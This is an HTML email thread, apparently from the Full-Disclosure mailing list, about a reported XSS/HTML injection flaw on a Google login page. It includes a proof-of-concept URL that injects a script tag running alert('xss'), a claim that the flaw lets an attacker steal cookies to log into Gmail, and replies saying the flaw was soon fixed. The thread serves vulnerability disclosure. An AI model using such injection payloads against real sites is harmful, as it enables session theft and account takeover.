<div>wow ! 0day !</div>
<div>damn, right now 0day are fucking XSS ...<br><br>&nbsp;</div>
<div><span class="gmail_quote">On 11/8/07, <b class="gmail_sendername">silky</b> &lt;<a href="mailto:michaelslists@gmail.com">michaelslists@gmail.com</a>&gt; wrote:</span>
<blockquote class="gmail_quote" style="PADDING-LEFT: 1ex; MARGIN: 0px 0px 0px 0.8ex; BORDER-LEFT: #ccc 1px solid">worked for me minutes after it was posted. seems fixed now.<br><br>On 11/9/07, crazy frog crazy frog &lt;<a href="mailto:i.m.crazy.frog@gmail.com">
i.m.crazy.frog@gmail.com</a>&gt; wrote:<br>&gt; i tested it on gmail latest version,itsnot working for me?<br>&gt;<br>&gt; On Nov 8, 2007 7:04 AM, Scripter Hack &lt;<a href="mailto:xss2root@gmail.com">xss2root@gmail.com</a>
&gt; wrote:<br>&gt; &gt; There is a html injection vulnerability in <a href="https://www.google.com">https://www.google.com</a>.<br>&gt; &gt; It&nbsp;&nbsp;is very critical,you can get the cookie to login into gmail ore other<br>&gt; &gt; service.
<br>&gt; &gt;<br>&gt; &gt; POC:<br>&gt; &gt; <a href="https://www.google.com/accounts/ServiceLogin?service=mail&amp;rm=false&amp;continue=http%3A%2F%2Fmail.google.com%2Fmail%2F%3Fui%3Dhtml%26zy%3Dl&amp;ltmpl=default&amp;ltmplcache=2&amp;passive=truel#">
https://www.google.com/accounts/ServiceLogin?service=mail&amp;rm=false&amp;continue=http%3A%2F%2Fmail.google.com%2Fmail%2F%3Fui%3Dhtml%26zy%3Dl&amp;ltmpl=default&amp;ltmplcache=2&amp;passive=truel#</a>&quot;&gt;&lt;/script&gt;&lt;script&gt;alert(&#39;xss&#39;)&lt;/script&gt;&amp;1-=1
<br>&gt; &gt;<br>&gt; &gt; More:<a href="http://xss2root.blogspot.com/">http://xss2root.blogspot.com/</a><br>&gt; &gt; _______________________________________________<br>&gt; &gt; Full-Disclosure - We believe in it.<br>&gt; &gt; Charter: 
<a href="http://lists.grok.org.uk/full-disclosure-charter.html">http://lists.grok.org.uk/full-disclosure-charter.html</a><br>&gt; &gt; Hosted and sponsored by Secunia - <a href="http://secunia.com/">http://secunia.com/</a>
<br>&gt; &gt;<br>&gt;<br>&gt;<br>&gt;<br>&gt; --<br>&gt; advertise on secgeeks?<br>&gt; <a href="http://secgeeks.com/Advertising_on_Secgeeks.com">http://secgeeks.com/Advertising_on_Secgeeks.com</a><br>&gt; <a href="http://newskicks.com">
http://newskicks.com</a><br>&gt;<br>&gt; _______________________________________________<br>&gt; Full-Disclosure - We believe in it.<br>&gt; Charter: <a href="http://lists.grok.org.uk/full-disclosure-charter.html">http://lists.grok.org.uk/full-disclosure-charter.html
</a><br>&gt; Hosted and sponsored by Secunia - <a href="http://secunia.com/">http://secunia.com/</a><br>&gt;<br><br><br>--<br>mike<br><a href="http://lets.coozi.com.au/">http://lets.coozi.com.au/</a><br><br>_______________________________________________
<br>Full-Disclosure - We believe in it.<br>Charter: <a href="http://lists.grok.org.uk/full-disclosure-charter.html">http://lists.grok.org.uk/full-disclosure-charter.html</a><br>Hosted and sponsored by Secunia - <a href="http://secunia.com/">
http://secunia.com/</a><br></blockquote></div><br>